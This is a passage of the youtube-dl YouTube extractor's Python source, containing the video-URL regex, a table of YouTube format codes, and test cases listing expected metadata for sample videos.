(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/|
(?:www\.)?deturl\.com/www\.youtube\.com/|
(?:www\.)?pwnyoutube\.com/|
(?:www\.)?hooktube\.com/|
(?:www\.)?yourepeat\.com/|
tube\.majestyc\.net/|
youtube\.googleapis\.com/) # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e)/(?!videoseries)) # v/ or embed/ or e/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
([0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?!.*?\blist=
(?:
%(playlist_id)s| # combined list/video URLs are handled by the playlist IE
WL # WL are handled by the watch later IE
)
)
(?(1).+)? # if we found the ID, everything can follow
$""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_NEXT_URL_RE = r'[\?&]next_url=([^&]+)'
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/rg3/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# DASH mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# DASH webm video
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# DASH webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# DASH webm audio with Opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
}
_SUBTITLE_FORMATS = ('ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
'start_time': 1,
'end_time': 9,
}
},
{
'url': 'https://www.youtube.com/watch?v=UxxajLWwzqY',
'note': 'Test generic use_cipher_signature video (#897)',
'info_dict': {
'id': 'UxxajLWwzqY',
'ext': 'mp4',
'upload_date': '20120506',
'title': 'Icona Pop - I Love It (feat. Charli XCX) [OFFICIAL VIDEO]',
'alt_title': 'I Love It (feat. Charli XCX)',
'description': 'md5:f3ceb5ef83a08d95b9d146f973157cc8',
'tags': ['Icona Pop i love it', 'sweden', 'pop music', 'big beat records', 'big beat', 'charli',
'xcx', 'charli xcx', 'girls', 'hbo', 'i love it', "i don't care", 'icona', 'pop',
'iconic ep', 'iconic', 'love', 'it'],
'duration': 180,
'uploader': 'Icona Pop',
'uploader_id': 'IconaPop',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IconaPop',
'license': 'Standard YouTube License',
'creator': 'Icona Pop',
'track': 'I Love It (feat. Charli XCX)',
'artist': 'Icona Pop',
}
},
{
'url': 'https://www.youtube.com/watch?v=07FYdnEawAQ',
'note': 'Test VEVO video with age protection (#956)',
'info_dict': {
'id': '07FYdnEawAQ',
'ext': 'mp4',
'upload_date': '20130703',
'title': 'Justin Timberlake - Tunnel Vision (Explicit)',
'alt_title': 'Tunnel Vision',
'description': 'md5:64249768eec3bc4276236606ea996373',
'duration': 419,
'uploader': 'justintimberlakeVEVO',
'uploader_id': 'justintimberlakeVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/justintimberlakeVEVO',
'license': 'Standard YouTube License',
'creator': 'Justin Timberlake',
'track': 'Tunnel Vision',
'artist': 'Justin Timberlake',
'age_limit': 18,
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'license': 'Standard YouTube License',
'age_limit': 18,
}
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=UxxajLWwzqY',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'license': 'Standard YouTube License',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark ft. Spree Wilson',
'description': 'md5:1900ed86ee514927b9e00fbead6969a5',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
'license': 'Standard YouTube License',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# JS player signature function name containing $
{
'url': 'https://www.youtube.com/watch?v=nfWlot6h_JM',
'info_dict': {
'id': 'nfWlot6h_JM',
'ext': 'm4a',
'title': 'Taylor Swift - Shake It Off',
'alt_title': 'Shake It Off',
'description': 'md5:95f66187cd7c8b2c13eb78e1223b63c3',
'duration': 242,
'uploader': 'TaylorSwiftVEVO',
'uploader_id': 'TaylorSwiftVEVO',
'upload_date': '20140818',
'license': 'Standard YouTube License',
'creator': 'Taylor Swift',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Controversy video
{
'url': 'https://www.youtube.com/watch?v=T4XJQO3qol8',
'info_dict': {
'id': 'T4XJQO3qol8',
'ext': 'mp4',
'duration': 219,
'upload_date': '20100909',
'uploader': 'TJ Kirk',
'uploader_id': 'TheAmazingAtheist',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheAmazingAtheist',
'license': 'Standard YouTube License',
'title': 'Burning Everyone\'s Koran',
'description': 'SUBSCRIBE: http://www.youtube.com/saturninefilms\n\nEven Obama has taken a stand against freedom on this issue: http://www.huffingtonpost.com/2010/09/09/obama-gma-interview-quran_n_710282.html',
}
},
# Normal age-gate video (No vevo, embed allowed)
{
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# Age-gate video with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=6kLq3WMV1nU',
'info_dict': {
'id': '6kLq3WMV1nU',
'ext': 'webm',
'title': 'Dedication To My Ex (Miss That) (Lyric Video)',
'description': 'md5:33765bb339e1b47e7e72b5490139bb41',
'duration': 246,
'uploader': 'LloydVEVO',
'uploader_id': 'LloydVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/LloydVEVO',
'upload_date': '20110629',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# video_info is None (https://github.com/rg3/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:12c56784b8032162bb936a5f76d55360',
'uploader': 'deadmau5',
'license': 'Standard YouTube License',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/rg3/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'license': 'Standard YouTube License',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympic',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'license': 'Standard YouTube License',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
},
},
# url_encoded_fmt_stream_map is an empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/rg3/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'license': 'Standard YouTube License',
'formats': 'mincount:31',
},
'skip': 'No longer relevant',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'license': 'Standard YouTube License',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jqWvoWXjCVs',
'info_dict': {
'id': 'jqWvoWXjCVs',
'title': 'teamPGP: Rocket League Noob Stream',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
},
'playlist': [{
'info_dict': {
'id': 'jqWvoWXjCVs',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (Main Camera)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7335,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': '6h8e8xoXJzg',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (kreestuh)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'PUOgX5z9xZw',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (grizzle)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'teuwxikvS5k',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (zim)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7334,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}],
'params': {
'skip_download': True,
},
},
{
# Multifeed video with comma in title (see https://github.com/rg3/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/rg3/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/rg3/youtube-dl/issues/1892,
# https://github.com/rg3/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk - Position Music',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'license': 'Standard YouTube License',
'creator': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk - Position Music',
'artist': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/rg3/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150127',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:dda0d780d5a6e120758d1711d062a867',
'duration': 4060,
'upload_date': '20151119',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/rg3/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:25b78d2f64ae81719f5c96319889b736',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'license': 'Standard YouTube License',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
},
]
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._player_cache = {}
def report_video_info_webpage_download(self, video_id):
"""Report attempt to download video info webpage."""
self.to_screen('%s: Downloading video info webpage' % video_id)
def report_information_extraction(self, video_id):
"""Report attempt to extract video information."""
self.to_screen('%s: Extracting video information' % video_id)
def report_unavailable_format(self, video_id, format):
"""Report extracted video URL."""
self.to_screen('%s: Format %s not available' % (video_id, format))
